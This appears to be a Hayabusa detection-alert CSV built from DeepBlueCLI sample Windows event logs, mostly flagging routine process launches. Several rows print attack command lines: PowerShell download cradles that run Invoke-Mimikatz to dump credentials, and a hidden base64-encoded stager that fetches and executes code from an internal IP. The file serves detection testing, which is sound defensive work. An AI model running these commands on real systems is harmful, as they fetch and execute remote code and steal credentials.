+2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AEMAPQBOAGUAVwAtAE8AQgBKAGUAYwBUACAAUwB5AHMAVABlAG0ALgBOAEUAdAAuAFcARQBiAEMATABpAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAEEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAG8AWABZACAAPQAgAFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBCAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwBYAHkAOwAkAHcAQwAuAFAAUgBvAHgAWQAuAEMAUgBlAEQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAEUAbgBUAGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4ARQB0AHcATwByAGsAQwBSAEUARABFAE4AdABpAGEATABzADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMAaABhAFIAWwBdAF0AJABiAD0AKABbAGMASABBAFIAWwBdAF0AKAAkAFcAYwAuAEQATwB3AG4ATABPAEEAZABTAFQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8ASQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
